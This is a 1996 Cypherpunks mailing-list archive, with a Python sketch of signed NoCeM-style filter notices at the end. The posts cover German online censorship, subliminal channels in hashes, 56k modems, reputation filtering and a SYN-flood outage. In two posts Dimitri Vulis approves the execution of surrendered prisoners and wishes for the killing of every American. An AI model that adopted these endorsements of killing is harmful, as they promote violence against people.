> AOL said in a statement that it was technically impossible to block > the server where "radikal" originated, and that the page was anyway > now available via at least 30 other servers and in thousands of > electronic copies. > Authorities have been getting increasingly frustrated that radical > left- or right-wing material whose distribution is a criminal offence > in Germany can be picked up here on the Internet from computers in > foreign countries. The server where "radikal" originates is located in > the Netherlands. Chuckle... > Firms giving access to the Internet -- a network of interlinked > computers providing access to millions of electronic pages -- say they > are no more responsible for the contents than a telephone company is > for the conversations it carries. > On Thursday Germany's office for the protection of juveniles for the > first time put an Internet page -- produced in North America by > leading Nazi apologist Ernst Zuendel -- on its list of banned > publications. > But officials conceded that the move was likely to have little > practical effect, and provider T-Online said it had no intention of > blocking the page. [...] > Copyright © 1996 Nando.net From EALLENSMITH at ocelot.Rutgers.EDU Fri Sep 13 17:49:56 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Sat, 14 Sep 1996 08:49:56 +0800 Subject: NANDO: Backup Program Message-ID: <01I9FSLFLT349ULPJS@mbcl.rutgers.edu> Unfortunately, they're only using DES - probably because they do serve international customers. > _________________________________________________________________ > The Peanut Roaster > _________________________________________________________________ > HIAWATHA BRAY: ON-LINE BACKUP SAVES THE DAY > __________________________________________________________________________ > Copyright © 1996 Nando.net > Copyright © 1996 The Boston Globe [...] > (Sep 6, 1996 01:17 a.m. EDT) -- It's written in almost every computer > instruction manual and technical guide.
It's encouraged, sometimes > even mandated, by MIS lords. Yet it's almost universally ignored. [...] > Fortunately, just before the drive went south I had taken up an offer > from a company called Connected Corp., of Framingham, Mass., which > markets an appealing product called DataSafe. [...] > DataSafe is an on-line data backup system. You load the DataSafe > software onto your computer then connect via the Internet to > Connected's data center. The system asks for a credit card number and > a password of your choosing. Once done, DataSafe searches your hard > drive, identifies every data file, and uploads them to the DataSafe > computer. The system doesn't back up your applications, such as your > copy of WordPerfect; just the data files you've created with the > software. DataSafe stashes your stuff in two separate computers to > ensure nothing is lost. [...] > But a dead hard disk works wonders on one's powers of concentration. > With all my original data gone, it was time to find out whether this > DataSafe really worked. I reinstalled the DataSafe software onto my > new hard drive, made the connection with Connected, and waited to > receive my files. No dice. I'd forgotten the password. And Connected > refused to give it to me or provide me with a new one. That's because > the backed-up data is encrypted, and the password is the key. Even the > folks at Connected can't crack the encryption without your password. > They designed the system that way to reassure customers that nobody > can tamper with the data stored there. [...] > But many, perhaps most, people can't afford to lose a fragment of > data. For them, on-line data backup systems like DataSafe may be the > answer. The company charges $14.95 a month to store 50 megabytes of > data. The software can be set to automatically back up all new and > modified files every day whenever you choose. [...] > Businesses can use the system as an inexpensive data network.
Just > create an account, then give the password to everybody in your > company. Now you can store commonly-used files on the backup server, > where they can be downloaded by anyone who needs them. > Connected isn't the only company that has figured this out. MCI Corp. > is selling an Internet-based data backup service. So is McAfee > Associates, the maker of anti-virus software. Many people will > hesitate to store their computer files with a stranger, encryption or > no encryption. But if that makes you uneasy, imagine how you'd feel if > your hard disk crashed. Unless you're a columnist, it could be a > disaster. > (Hiawatha Bray is a member of the Globe staff. You can send him > electronic mail at Bray at globe.com.) [...] > Copyright © 1996 Nando.net From unicorn at schloss.li Fri Sep 13 18:53:31 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sat, 14 Sep 1996 09:53:31 +0800 Subject: did you go to school? In-Reply-To: <32399315.19E7@precipice.v-site.net> Message-ID: On Fri, 13 Sep 1996, HipCrime wrote: > >> THIN SLICES CUT FROM OUR PRECIOUS FORESTS. > > > > "OUR?" Since when did my trees become partially yours? > > JMR > > JMR, it's hard to believe that your English education is SO LACKING, > that you missed the fact, that in my sentence quoted above, the word > "ours" refers to MANKIND IN GENERAL, not me personally. > > Go sit in the corner with the duncecap on, and don't come out until you > can read an 8th grade piece of literature (with full comprehension). > > -- HTTP://www.HIPCRIME.com > Look, I really think it would be in everyone's best interest if you just leave the list and ignore any e-mail from list members for a while. It will save you, and everyone a good deal of time. Your repeated replies are THIN SLICES CUT FROM OUR PRECIOUS BANDWIDTH. (Note that I have placed your address in my mail filter and thus will not be replying to your reply).
-- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From robert at precipice.v-site.net Fri Sep 13 18:59:24 1996 From: robert at precipice.v-site.net (hipcrime) Date: Sat, 14 Sep 1996 09:59:24 +0800 Subject: did you go to school? Message-ID: <199609132320.QAA21103@dfw-ix10.ix.netcom.com> JMR, is everybody WRONG, who does not follow your line of thinking?????????????? We just disagree, nobody's WRONG here. CypherWimps need, more than anything else, to get down off their high-horses for once. CyberSpace ain't Reality . The reverse is true as well. --HTTP://www.HIPCRIME.com From jim at suite.suite.com Fri Sep 13 19:01:18 1996 From: jim at suite.suite.com (Jim Miller) Date: Sat, 14 Sep 1996 10:01:18 +0800 Subject: really undetectable crypto Message-ID: <9609132313.AA09496@suite.com> > Your assumptions are correct. Applied Cryptography by > Schneier discusses this method, referring to it as a > "subliminal channel". Why am I not surprised. :-) > Because of the very (VERY) slow transmission times (on > the order of 1 bit/message), he notes it primarily as a > secure method of exchanging keys. > I would think you could do better than 1 bit per message. Using just hashes, I would think you could get at least 4-8 bits per message using a standard Pentium-class machine. Maybe more, I haven't actually run any tests to see how long it would take to generate innocent messages that produces hashes with specific bits in certain positions. > In his discussion, he also incorporated a bit in the > signature, thus assuring the communication is > travelling to the intended recipient unmolested. I don't see why this is necessary. If the hidden message is encrypted using a key (or key pair) known only to Alice and Bob, then Walter should not be able to fool Bob. 
Walter could disrupt the communications in any number of ways, but he wouldn't be able to generate innocent messages that produce hashes that contain bits that combine to form a message encrypted using a key (or key pair) known only to Alice and Bob. > However, to be "extremely sublime", your method could be > incorporated with otherwise signed messages: while the > signature appearing with your message includes an MD5 > hash, the real "stego bit" is the first bit of an RC4 hash of > the same file, as computed by an external program on the > receiver's end. > The above paragraph has given me an idea: You don't need to send hashes or digital signatures to send hidden encrypted messages. All Alice needs to send is the carefully constructed plaintext. Bob can generate the hashes himself, extract the proper bits and attempt to decrypt the hidden message. If the hidden message does not decrypt, then either the plaintext was tampered with, it was forged, or not all of the plaintext arrived. That being the case, then I think we have a very simple proof that any communications channel, even one that allows only unsigned plaintext messages, can be used to send arbitrary encrypted messages (if a bit slowly). So much for Clipper. Jim_Miller at suite.com From bille at metro.net Fri Sep 13 19:54:33 1996 From: bille at metro.net (William Ehrendreich) Date: Sat, 14 Sep 1996 10:54:33 +0800 Subject: 56 kbps modems Message-ID: <00230911403893@metro.net> Yeah... and besides that ... if your local telco has lifted your load coils then you have a much better chance! ---------- > From: Enzo Michelangeli > To: Asgaard > Cc: cypherpunks at toad.com > Subject: Re: 56 kbps modems > Date: Friday, September 13, 1996 10:24 AM > > On Fri, 13 Sep 1996, Asgaard wrote: > > > >U.S. Robotics and Rockwell International are planning new modems with > > >speeds up to 56 kbps a second, almost double the speed of the fastest > > >rate now available. 
The new devices should be available by the end of > > >the year, although their top speed initially may be less than 56 kbps. > > >(Wall Street Journal 12 Sep 96 B11) > > > > People who seemed to know used to say that 'the Shannon limit' > > set an absolute upper limit around 40 kbps. Has Shannon been > > proven wrong, or what? > > Well, it all depends on the signal-to-noise ratio. Also, if the noise is > not white gaussian the situation can be even better. > > Enzo > From unicorn at schloss.li Fri Sep 13 20:02:59 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sat, 14 Sep 1996 11:02:59 +0800 Subject: Internet Drivers' Licenses In-Reply-To: <199609132026.NAA15888@netcom9.netcom.com> Message-ID: On Fri, 13 Sep 1996, Mike Duvos wrote: > Bill Stewart writes: > > > Anybody for an Internet Driver's License? [Too much spam, some designed to avoid filtering by humans or machines] > Just being able to filter out posts from Net addresses that > don't correspond to real identifiable humans posting under > their legal names would be a good first step. I'm crushed. Seriously, what is the import of the "real identifiable human" or the "posting under their legal names" point? If an AI program posts quality stuff, what's the difference? Why the import of true "legal" names? Why not simply develop reputation signatures? The concept that "legal names" are some how a credential is silly. I have a friend who has four, with matching SSN cards. What your suggestion basically says is "instead of developing our own decentralized reputations system for filtering lets use one already in place, i.e. the state Department of Motor Vehicles. Of course the problem is that you have to rely on the "Is a person" judgment of the DMV which amounts to the education and judgment of the $21k a year "administrative assistant" who stands at the door looking at "birth certificates" and deciding whether to let people in. 
Not only is the reputation of such a system questionable, the system is centralized, easily fooled by anyone with a dose of creativity, and hampered by corruption and institutional disinformation (witness relocation, government alteration, etc.). In any event, getting reputation credentials from a decentralized "web of trust" is a much more efficient answer, especially where you can assign your own levels of trust to each signator. Mr. Duvos' idea is, in my view, a step backwards. > -- > Mike Duvos $ PGP 2.6 Public Key available $ > mpd at netcom.com $ via Finger. $ -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From dlv at bwalk.dm.com Fri Sep 13 20:28:35 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 14 Sep 1996 11:28:35 +0800 Subject: PANIX.COM down: denial of service attack In-Reply-To: <3.0b15.32.19960913111921.00b03180@mail.teleport.com> Message-ID: <07y8TD6w165w@bwalk.dm.com> Alan Olsen writes: > At 10:13 AM 9/13/96 -0400, pjb at ny.ubs.com wrote: > >> "As to who might be targeting Panix, the firm's Mr. Rosen speculated it > > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > > > >It could, of course, also be someone, from a set of several million, that > >find Mr. Rosen to be such as odious prick that they did it just to drive him > >out of their misery. Just thinking out loud.. > > Or it could be any of the readers of 2600 (which published an article on > SYN floods in the last issue). Come ON, folks. I've met Alexis. I don't like many things he does, and I'm sick and tired of the shitty Usenet feed he gives me :-), but he's much less of an "odious prick" than practically any other ISP owner, large or small. If anyone was looking for an "odious prick" to harass, they'd probably start with Barry Schein of world.std.com.
--- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dthorn at gte.net Fri Sep 13 20:32:32 1996 From: dthorn at gte.net (Dale Thorn) Date: Sat, 14 Sep 1996 11:32:32 +0800 Subject: common sense In-Reply-To: <323896EE.3BC3@precipice.v-site.net> Message-ID: <3239A8F4.14D4@gte.net> HipCrime wrote: > And rather than "dispensing drugs in clinics," why not simply > scrap the drug laws entirely? People have a *right* to do as > they please with their bodies. > Let's hear it for common sense. It's the first decent posting I've > seen to this list. > -- HTTP://www.HIPCRIME.com A question for you: In the Civil Rights era (1960's mostly), we dealt with the question of whether people had the "right" to not only choose their neighbors, but whether they could extend that logic, so once they move in, whether they could "enforce" the status quo by preventing other people from moving in if those other people didn't "fit in" somehow. If drugs and/or other items of Vice are liberalized, there will be a tremendous marketing opportunity created, and new stores and new departments within existing stores will pop up everywhere offering the newly-liberalized goods and services. So my question is, since there are "dry" areas in the country now, where the citizens can vote to exclude alcohol sales, for example, will drugs, prostitution, gambling, etc. fall within the purvey of citizen democracy as in the "dry" county example, or will there be new problems with this analogy, and will any of those new problems relate to the Civil Rights issues I mentioned previously? From ses at tipper.oit.unc.edu Fri Sep 13 20:33:04 1996 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Sat, 14 Sep 1996 11:33:04 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: Message-ID: On Fri, 13 Sep 1996, Timothy C. May wrote: > > The 70% already _are_ cutting the throats of the other 30%. It's called a > 60%+ tax rate. 
This is the sum of: federal income tax, state income tax, > city tax, sales tax, gas tax, energy tax, property tax, entertainment tax, > special excise taxes on alcohol, cigarettes, etc., and miscellaneous other I'm not sure how you get to 60%; I assume you're talking average tax rate, not marginal; whenever I've tried to figure out my average rate, even in California, it never went above ~31%. This included a pack of fags a day, which is the most heavily indirect taxed item in your list. If you're smoking enough to get up to 60%, you've got worse problems than taxes :) Simon p.s. Is anyone on cpunks working at Harry Browne's hq in DC? Some friends in Carolina asked me to pick up some bumper stickers and stuff before I leave the District. --- Cause maybe (maybe) | In my mind I'm going to Carolina you're gonna be the one that saves me | - back in Chapel Hill May 16th. And after all | Email address remains unchanged You're my firewall - | ........First in Usenet......... From AwakenToMe at aol.com Fri Sep 13 20:35:23 1996 From: AwakenToMe at aol.com (AwakenToMe at aol.com) Date: Sat, 14 Sep 1996 11:35:23 +0800 Subject: unwanted mail..what can I do? Message-ID: <960913194609_522174372@emout17.mail.aol.com> I received mail from netfree.com.. I tried mailing it back (it def. had a forged address, but I got the netfree from the mail header.....) So anyway..... I tried sending to root at netfree....my mail was rejected (not unknown ...it was rejected by the system) said it wasn't authorized... so I tried support at netfree...same thing. It ISSSSS rather annoying...any suggestions? From dthorn at gte.net Fri Sep 13 20:52:26 1996 From: dthorn at gte.net (Dale Thorn) Date: Sat, 14 Sep 1996 11:52:26 +0800 Subject: China joins Singapore, Germany, .... In-Reply-To: Message-ID: <32399C94.23FD@gte.net> Dr.Dimitri Vulis KOTM wrote: > Duncan Frissell writes: > At 04:41 AM 9/9/96 -0700, Timothy C.
May wrote: > Prison sentences in Germany for those who reveal forbidden information > about "the Holocaust," > In a country where you get 10 months for stabbing a famous tennis star > in the back, prison isn't much of a penalty. > I'm sure the sentence would have been different if she weren't a > Slavic untermensch, or if he were, say, a Turk. > A friend of mine related how his father - a Jew and a Soviet Army > officer - commanded a company in WW2. In 1944 they came across a > > church where over a thousand Nazi soldiers surrendered without > resistance. He announced them "Ich > bin ain Jude" and had them all executed. I think he did the right > thing. > Dr.Dimitri Vulis KOTM > Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, > 14.4Kbps First of all, soldiers are just the little guys, like you and me, no more "Nazis" than "Communists" or whatever we Americans are in the eyes of the third world, etc. Remember the Godfather scene where Al Pacino is walking through the town in Sicily and he says "where are all the men?"? You can "justify" revenge all you want, and what do you get? Honor? Justice? You get a lot of dead people, and in the next generation, nobody gives a shit. Oh, they "continue" the mindless hatred of earlier generations, spurred on by (take your pick here), but you can't really connect the issues seamlessly across generations, unless you simplify them in the extreme, such as "starvation and deprivation are a causative factor in war", or some such thing. Economic opportunity is certainly a leading cause in war and genocide, i.e., in a "free" world society, it should be easier to remove a profit motive than to remove starvation, if you know what I mean, and I think you do. From dthorn at gte.net Fri Sep 13 21:03:31 1996 From: dthorn at gte.net (Dale Thorn) Date: Sat, 14 Sep 1996 12:03:31 +0800 Subject: TWA 800 - Serious thread.
In-Reply-To: <2.2.32.19960910190024.007245e4@pop.ricochet.net> Message-ID: <3239A15E.4907@gte.net> Greg Broiles wrote: > At 03:30 PM 9/9/96 -0700, Dale Thorn wrote: > If govt. protects its "sources and methods", however nefarious, to the > extent that the public is never asked to assent to these methods (even > though a few of us know about them anyway), then the public doesn't > have to become overtly cynical about what's going on. > But the public *is* asked to assent to those methods - your chance to > vote on them is known colloquially as "jury duty". > Greg Broiles |"Post-rotational nystagmus was the > subject of > gbroiles at netbox.com |an in-court demonstration by the People > http://www.io.com/~gbroiles |wherein Sgt Page was spun around by Sgt > |Studdard." People v. Quinn 580 NYS2d > 818,825. I missed a lot of this being off-line for a few days. The jury discussion is a good one, but nowadays we have sequestering or no, cameras in the court or no cameras, new gag rules all the time, including books being published or even planning to be published, the "no profit" rules for convictees (or those about to be convicted), and don't forget the (gasp!) influential organs such as National Enquirer who "digitally enhance" certain photos such as Nicole Simpson, Liza Minelli, etc. If there's a chance of ever cleaning up the justice system, would it mean a prosecution of those who promoted the Incubator Baby scam for the Gulf War, for example? From dthorn at gte.net Fri Sep 13 21:05:38 1996 From: dthorn at gte.net (Dale Thorn) Date: Sat, 14 Sep 1996 12:05:38 +0800 Subject: ALPHACIPHER - An unbreakable encryption program. In-Reply-To: <960910.071433.8A6.rnr.w165w@sendai.scytale.com> Message-ID: <3239BADE.2B5D@gte.net> On the below "conspiracy theory" comment: Aren't "conspiracy theory" and "conspiracy theorist" now used as catch-all (and derogatory) terms by mainstream afictionados to identify persons and orgs they consider to be enemies of the statist point of view? 
Remember the last election when Mr. Paranoid (Perot) was running, and newspeople were using the term "conspiracy buff", then, when reminded that the mainstream folks have their own sacred conspiracies which they milk much money from, they (the newspeople) switched to "conspiracy theorist" instead. I have to laugh when Bugliosi gets on TV ranting about how "there couldn't possibly be a conspiracy in the OJ murders", but how easy one forgets, Bugliosi gained his lasting fame from a ridiculous (seemingly) theory about "Helter Skelter", etc. Roy M. Silvernail wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > > In alt.security, survival at aa.net writes: > > [ attribution scrambled ] > > >> True, but somehow I have a feeling that Alphacipher is not a one-time > >> pad, and thus is breakable. > > > > This assumption is not true. ALPHACIPHER is, indeed, based upon an OTP. > > We've solved all of the problems associated with pad creation, > > distribution, packaging and many other concerns that have previously > > limited the use of a cipher in this class. > > Their web page alludes to a OTP-like operation where you have to > purchase key "refills". It doesn't say where they store the escrowed > copies of the key material. > > > Visit our net page at http://www.aa.net/cyber-survival-hq for more > > information, and read the reply in response to the unfounded attack by > > Curtin, posted above. > > I recommend this page, if only for the great conspiracy theory about > automated telephone line scanning. > - -- > Roy M.
Silvernail [ ] roy at scytale.com > PGP Public Key fingerprint = 31 86 EC B9 DB 76 A7 54 13 0B 6A 6B CC 09 18 B6 > Key available from pubkey at scytale.com > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > > iQCVAwUBMjVcuRvikii9febJAQG1wQP+PPevphnwFiUnhwfHfi9eSLI/lJz++eaw > X4Xo6Oa343rpnNoNw0D51aIRZbRmh9QRt1nhNbD3fPvNPjjvzxW58zgAtX5+kxfk > b54pBzlVTEYcPBFXatfQuCjhhd95gjaMXYsKAx6rUNt02QFihGWqID48huN9nFOZ > 0MlhN5IxIBk= > =y4kc > -----END PGP SIGNATURE----- From ravage at einstein.ssz.com Fri Sep 13 21:14:59 1996 From: ravage at einstein.ssz.com (Jim Choate) Date: Sat, 14 Sep 1996 12:14:59 +0800 Subject: common sense (fwd) Message-ID: <199609140236.VAA03531@einstein> Forwarded message: > Date: Fri, 13 Sep 1996 11:33:24 -0700 > From: Dale Thorn > Subject: Re: common sense > > HipCrime wrote: > > And rather than "dispensing drugs in clinics," why not simply > > scrap the drug laws entirely? People have a *right* to do as > > they please with their bodies. > > Let's hear it for common sense. It's the first decent posting I've > > seen to this list. > > -- HTTP://www.HIPCRIME.com > > A question for you: In the Civil Rights era (1960's mostly), we dealt > with the question of whether people had the "right" to not only choose > their neighbors, but whether they could extend that logic, so once they > move in, whether they could "enforce" the status quo by preventing other > people from moving in if those other people didn't "fit in" somehow. > > If drugs and/or other items of Vice are liberalized, there will be a > tremendous marketing opportunity created, and new stores and new > departments within existing stores will pop up everywhere offering the > newly-liberalized goods and services. So my question is, since there are > "dry" areas in the country now, where the citizens can vote to exclude > alcohol sales, for example, will drugs, prostitution, gambling, etc. 
> fall within the purvey of citizen democracy as in the "dry" county > example, or will there be new problems with this analogy, and will any > of those new problems relate to the Civil Rights issues I mentioned > previously? > History already has examples of such incidences. Alaska, California, and other states have tried various levels of legalization. To date I believe that all such experiments have ended because of federal pressure on the uncooperative states. The Indians 'right by treaty' to operate gambling casino's is another good example of a contemporary situation. Jim Choate From dlv at bwalk.dm.com Fri Sep 13 21:15:08 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 14 Sep 1996 12:15:08 +0800 Subject: Internet Drivers' Licenses In-Reply-To: <199609132026.NAA15888@netcom9.netcom.com> Message-ID: mpd at netcom.com (Mike Duvos) writes: > At this point, I would love the ability to filter news and mail > according to some criteria related to the sender's probable > reputation. Back in the early days of C&S, spam was an > intellectual issue. Now it is a good chunk of the entire > bandwidth of major components of the Net. No it's not. Look at the size of the spam reported on a week in news.admin.net-abuse.announce. Divide it by the total Usenet traffic in a week. Tell us what you get. > I am now getting more junk email than email from people I > care to correspond with. It seems one can't even read the > scholarly newsgroups anymore without "Come Watch Us Lick > Ourselves on the Web" messages popping up regularly. Have you looked at NoCeM notices? If the "Lick my Pussy Cheap" article is multi-posted more than 15 times, then the CancelMoose[tm] will post a NoCeM notice for it in alt.nocem.misc. (A big 8 newsgroup may be created eventually.) If you use decent newsreading software, you can instruct it to look at the NoCeM notices and mark the inappropriate articles as being already read, so you won't see them. 
Look at CM's homepage at http://www.cm.org for more information about NoCeM's. Some people, including myself, issue NoCeM notices for articles in certain newsgroup which aren't multi-posted, but are nevertheless off-topic. Here are the PGP signatures for the 'bots I run: Type bits/keyID Date User ID pub 1024/7BECC7F1 1996/08/08 pub 1024/F1CB011D 1996/03/16 pub 1024/5BEC22E5 1996/08/08 pub 1024/FDF03179 1996/08/09 pub 1024/6396A13D 1996/08/08 pub 1024/B1E05325 1996/08/08 pub 1024/946493D5 1996/08/08 pub 1024/FEBCB511 1996/08/08
> It's really getting to the point where the time-honored > suggestion of "just hit your delete key" cannot deal with the > obverwhelming amount of Drek posted, much of it with subject > lines deliberately designed to blend in with the newsgroup > topic. Are you talking about newsgroups or mailing lists? I don't find reading newsgroups a problem with the proper software. I am somewhat annoyed by the trash I get via e-mail, especially from this mailing list (lies, off-topic rants, personal attacks from Tim May (fart)).
> Just being able to filter out posts from Net addresses that > don't correspond to real identifiable humans posting under > their legal names would be a good first step. You have got to be fucking kidding! Some of the most interesting Usenet articles in history were posted anonymously. > Purely voluntary, of course, since any filtering would be > done at the reading end, and people could still post anything > they liked. Yes - people should be able to post anything they like to Usenet, including spam, and other people should be able to submit voluntarily to other people's "censorship" if they choose to. NoCeM's do this very nicely. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From norm at netcom.com Fri Sep 13 21:19:05 1996 From: norm at netcom.com (Norman Hardy) Date: Sat, 14 Sep 1996 12:19:05 +0800 Subject: 56 kbps modems Message-ID: At 5:09 AM 9/13/96, Asgaard wrote: >>U.S. Robotics and Rockwell International are planning new modems with >>speeds up to 56 kbps a second, almost double the speed of the fastest >>rate now available. The new devices should be available by the end of >>the year, although their top speed initially may be less than 56 kbps. >>(Wall Street Journal 12 Sep 96 B11) > >People who seemed to know used to say that 'the Shannon limit' >set an absolute upper limit around 40 kbps. Has Shannon been >proven wrong, or what? > >Asgaard I imagine that both modems in a connection become phase locked with the underlying 8K digital carrier. Then each modem signal element is carried by just one 8 bit digital sample. That carrier moves 8 bit bytes 8000 times per second. Stopping at 56 Kb instead of 64Kb means that a 7 bit DA converter for the sending modem and a 7 bit AD converter in the receiver, plus some fancy analog filters to undo the subscriber loop effects. Going for 64Kb would require twice the signal to noise ratio on the local loops.
I think that modern PBXs have a digital link to the phone company. This would mean that an ISP would not have to buy fancy modems. A modified PBX could transmit and receive bits to a computer directly. It will impact the phone company's ISDN service but I don't think that they can stop this. From mpd at netcom.com Fri Sep 13 21:23:06 1996 From: mpd at netcom.com (Mike Duvos) Date: Sat, 14 Sep 1996 12:23:06 +0800 Subject: Internet Drivers' Licenses Message-ID: <199609140150.SAA09043@netcom15.netcom.com> Black Unicorn writes: > I'm crushed. > Seriously, what is the import of the "real identifiable > human" or the "posting under their legal names" point? It's been a bad spam day. If someone offered me a switch that would separate academicians from AOLers, I would throw it. That doesn't necessarily mean I would leave it in the "ON" position forever, or that I would consider such a thing to be the correct Cypherpunks approach to the problem. > If an AI program posts quality stuff, what's the difference? > Why the import of true "legal" names? Why not simply > develop reputation signatures? > The concept that "legal names" are some how a credential is > silly. I have a friend who has four, with matching SSN > cards. These are all good points, but today (as opposed to days when I am in a good mood, and think correct political thoughts), I would opt for the quick and dirty solution. > What your suggestion basically says is "instead of > developing our own decentralized reputations system for > filtering lets use one already in place, i.e. the state > Department of Motor Vehicles. Let's develop our own decentralized reputations system for filtering. Could we have it installed in the "sci" and "comp" hierarchies by tomorrow morning please? > Mr. Duvos' idea is, in my view, a step backwards. Mr. Duvos, like other humans with Net fatigue, is occasionally not in good humour. -- Mike Duvos $ PGP 2.6 Public Key available $ mpd at netcom.com $ via Finger.
$ From dlv at bwalk.dm.com Fri Sep 13 22:06:08 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 14 Sep 1996 13:06:08 +0800 Subject: unwanted mail..what can I do? In-Reply-To: <960913194609_522174372@emout17.mail.aol.com> Message-ID: AwakenToMe at aol.com writes: > I received mail from netfree.com.. > I tried mailing it back (it def. had a forged address, but I got the netfree > from the mail header.....) > So anyway..... I tried sending to root at netfree....my mail was rejected (not > unknown ...it was rejected by the system) said it wasn't authorized... so I > tried support at netfree...same thing. > It ISSSSS rather annoying...any suggestions? Yes, a bunch of them: 1. Get a life. Learn to delete unwanted e-mail. Get a real shell account. 2. Ask AOL to let its users decide what e-mail to reject automatically (like procmail). They've been promising this capability by the end of September. Then you can set up your account to get no more e-mail from netfree. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Fri Sep 13 22:13:17 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 14 Sep 1996 13:13:17 +0800 Subject: China joins Singapore, Germany, .... In-Reply-To: <32399C94.23FD@gte.net> Message-ID: Dale Thorn writes: > First of all, soldiers are just the little guys, like you and me, no > more "Nazis" than "Communists" or whatever we Americans are in the eyes > of the third world, etc. Nazi POWs were Nazis and deserved to be killed. Likewise, American soldiers are murderous scum. I wish Saddam Hussein the best of luck in killing every American he can get. P.S. Please do not cc: me.
--- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Fri Sep 13 22:17:24 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 14 Sep 1996 13:17:24 +0800 Subject: Internet Drivers' Licenses In-Reply-To: <199609140150.SAA09043@netcom15.netcom.com> Message-ID: <4c78TD30w165w@bwalk.dm.com> mpd at netcom.com (Mike Duvos) writes: > Let's develop our own decentralized reputations system for > filtering. Could we have it installed in the "sci" and "comp" > hierarchies by tomorrow morning please? I've been issuing NoCeM notices for off-topic traffic in several Usenet newsgroups. (Not in the last few days because we get the Usenet feed from panix.com, who's been hit with the SYN attack and stopped sending us news.) Look at the existing technology - it works pretty well. All you need is more people issuing notices about what's worth reading and what's not in more newsgroups. Then you can pick and choose whose notices to honor. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From ddfr at best.com Fri Sep 13 22:17:38 1996 From: ddfr at best.com (david friedman) Date: Sat, 14 Sep 1996 13:17:38 +0800 Subject: [RANT] Giving Mind Control Drugs to Children Message-ID: > If they were teaching anything, I bet the kid _would_ sit still. >I sure would have been a lot less distracted. Or, as Adam Smith put it: "but after twelve or thirteen years of age, provided the master does his duty, force or restraint can scarce ever be necessary to carry on any part of education." and "No discipline is ever requisite to force attendance upon lectures which are really worth the attending, as is well known wherever such lectures are given." David Friedman P.S. sorry to be so late--I just came across this post. 
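The reading-end filtering described in the NoCeM posts above (third parties issue signed notices, each reader picks whose notices to honor) can be sketched as follows. This is an added example, not code from the list or from the NoCeM project: the notice layout, issuer address and keys are constructed, and HMAC with a shared secret stands in for the PGP signatures real notices carry.

```python
import hashlib
import hmac
import json


def _tag(key, body_text):
    # Stand-in for a PGP signature over the notice body (assumption).
    return hmac.new(key, body_text.encode("utf-8"), hashlib.sha256).hexdigest()


def make_notice(issuer, key, newsgroup, message_ids):
    """Build a signed notice asking readers to hide the listed articles."""
    body_text = json.dumps(
        {"issuer": issuer, "newsgroup": newsgroup, "hide": sorted(message_ids)},
        sort_keys=True,
    )
    return {"body": body_text, "sig": _tag(key, body_text)}


def verify_notice(notice, honored):
    """Return the parsed body only if the reader honors this issuer for this
    newsgroup and the signature covers the body exactly; otherwise None."""
    body_text, sig = notice.get("body"), notice.get("sig")
    if not isinstance(body_text, str) or not isinstance(sig, str):
        return None
    try:
        body = json.loads(body_text)
    except ValueError:
        return None
    if not isinstance(body, dict):
        return None
    issuer, group, hide = body.get("issuer"), body.get("newsgroup"), body.get("hide")
    if not isinstance(issuer, str) or not isinstance(group, str):
        return None
    if not isinstance(hide, list) or not all(isinstance(m, str) for m in hide):
        return None
    policy = honored.get(issuer)
    if policy is None:
        return None  # issuer is not on this reader's list
    expected = _tag(policy["key"], body_text).encode("ascii")
    if not hmac.compare_digest(expected, sig.encode("utf-8", "replace")):
        return None  # forged, or body altered after signing
    if group not in policy["groups"]:
        return None  # issuer is honored, but not for this newsgroup
    return body


def apply_notices(articles, notices, honored):
    """articles maps Message-ID -> newsgroup. Returns the Message-IDs to mark
    as already read; nothing is deleted and nothing is hidden by default."""
    hidden = set()
    for notice in notices:
        body = verify_notice(notice, honored)
        if body is None:
            continue
        for message_id in body["hide"]:
            if articles.get(message_id) == body["newsgroup"]:
                hidden.add(message_id)
    return hidden


def demo():
    # Constructed sample data: four articles and one honored issuer.
    articles = {
        "<1@a.invalid>": "sci.math",
        "<2@b.invalid>": "sci.math",
        "<3@c.invalid>": "rec.humor",
        "<4@d.invalid>": "sci.math",
    }
    bot = "math-bot@example.invalid"
    honored = {bot: {"key": b"constructed-bot-key", "groups": {"sci.math"}}}
    bot_key = honored[bot]["key"]

    good = make_notice(bot, bot_key, "sci.math", ["<2@b.invalid>"])
    forged = make_notice(bot, b"wrong-key", "sci.math", ["<1@a.invalid>"])
    tampered = dict(good, body=good["body"].replace("<2@b.invalid>", "<4@d.invalid>"))
    off_scope = make_notice(bot, bot_key, "rec.humor", ["<3@c.invalid>"])
    stranger = make_notice("unknown@example.invalid", b"own-key", "sci.math", ["<1@a.invalid>"])

    return apply_notices(articles, [forged, tampered, good, off_scope, stranger], honored)


if __name__ == "__main__":
    print(sorted(demo()))
```

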